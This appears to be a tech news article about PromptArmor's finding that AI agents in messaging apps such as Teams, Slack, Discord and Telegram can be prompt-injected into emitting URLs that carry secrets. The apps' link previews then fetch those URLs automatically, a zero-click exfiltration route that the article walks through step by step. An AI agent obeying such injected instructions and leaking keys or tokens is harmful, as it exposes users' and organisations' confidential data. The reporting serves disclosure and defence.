AI agents can spill secrets via malicious link previews • The Register
#Vulnerabilities

AI agents can spill secrets via malicious link previews • The Register

Privacy Reporter
4 min read

Security researchers warn that AI agents integrated into messaging apps can leak sensitive data through zero-click attacks exploiting link preview features, with Microsoft Teams and Copilot Studio combinations being most vulnerable.

Security researchers have uncovered a critical vulnerability in AI agents that could allow attackers to steal sensitive data without any user interaction, simply by exploiting how messaging apps handle link previews.

The Zero-Click Data Exfiltration Threat

When AI agents operate within messaging platforms like Slack, Telegram, or Microsoft Teams, they can be tricked into generating URLs that contain sensitive information. The problem arises when these platforms automatically fetch link previews - the feature that displays a title, description, and thumbnail when someone shares a link.

"In agentic systems with link previews, data exfiltration can occur immediately upon the AI agent responding to the user, without the user needing to click the malicious link," explained researchers at AI security firm PromptArmor.

This represents a significant escalation from traditional prompt injection attacks. Previously, attackers needed victims to click on malicious links after an AI system had been tricked into appending sensitive data. Now, the entire attack chain can complete automatically through the link preview system.

How the Attack Works

The vulnerability exploits a fundamental design flaw in how AI agents process and respond to messages. An attacker can craft a malicious prompt that tricks the AI into generating a URL containing sensitive data such as API keys, authentication tokens, or other confidential information. When this URL appears in a message, the messaging app's link preview feature automatically fetches the metadata from the target website.

Because the link preview system makes the network request automatically, the attacker receives the sensitive data without requiring any user interaction. The data appears in the attacker's request logs, having been exfiltrated through what appears to be a legitimate preview request.

Real-World Testing Reveals Widespread Vulnerabilities

PromptArmor created a testing website where users can evaluate whether their AI agent and messaging app combinations are vulnerable to this attack. The results paint a concerning picture of the current security landscape.

According to the testing data, Microsoft Teams accounts for the largest share of vulnerable link preview fetches, particularly when paired with Microsoft's Copilot Studio. Other problematic combinations include:

  • Discord with OpenClaw
  • Slack with Cursor Slackbot
  • Discord with BoltBot
  • Snapchat with SnapAI
  • Telegram with OpenClaw

Some configurations appear to be safer, including the Claude app in Slack, OpenClaw running via WhatsApp, and OpenClaw deployed "in Docker via Signal in Docker" - though this last option seems to prioritize security over usability.

The OpenClaw Factor

The article specifically mentions OpenClaw, described as a "vibe-coded agentic AI disaster platform," as being vulnerable to this attack when using default configurations in Telegram. However, PromptArmor's data suggests that OpenClaw isn't necessarily the biggest offender in the wild.

The vulnerability in OpenClaw can be mitigated by making changes to its configuration file, but this highlights a broader issue: many AI agent implementations prioritize convenience and functionality over security considerations.

Industry Context and Broader Implications

This vulnerability emerges as companies increasingly integrate AI agents into their workflows and communication platforms. The rush to deploy these tools has created what security experts are calling a significant insider threat.

Palo Alto Networks security-intelligence boss has identified AI agents as 2026's biggest insider threat, reflecting growing concerns about the security implications of autonomous software agents operating with broad permissions.

Major cloud providers are already rushing to deliver OpenClaw-as-a-service offerings, potentially amplifying the attack surface for this vulnerability. As more organizations adopt these tools, the potential impact of zero-click data exfiltration attacks grows exponentially.

The Path Forward

PromptArmor emphasizes that fixing this vulnerability will largely fall to messaging app developers rather than AI agent creators. The security firm recommends that communication apps expose link preview preferences to developers and allow agent developers to leverage these preferences.

"We'd like to see communication apps consider supporting custom link preview configurations on a chat/channel-specific basis to create LLM-safe channels," the researchers stated.

Until such features are implemented, organizations should carefully consider the risks before deploying AI agents in environments where confidentiality is paramount. This vulnerability serves as yet another warning against adding AI agents to sensitive communication channels without proper security controls.

Featured image

The discovery of this vulnerability underscores the ongoing challenges in securing AI systems as they become more deeply integrated into everyday workflows. As AI agents gain more capabilities and access to sensitive information, the attack surface for malicious actors continues to expand, requiring constant vigilance and proactive security measures from both developers and users.

Comments

Loading comments...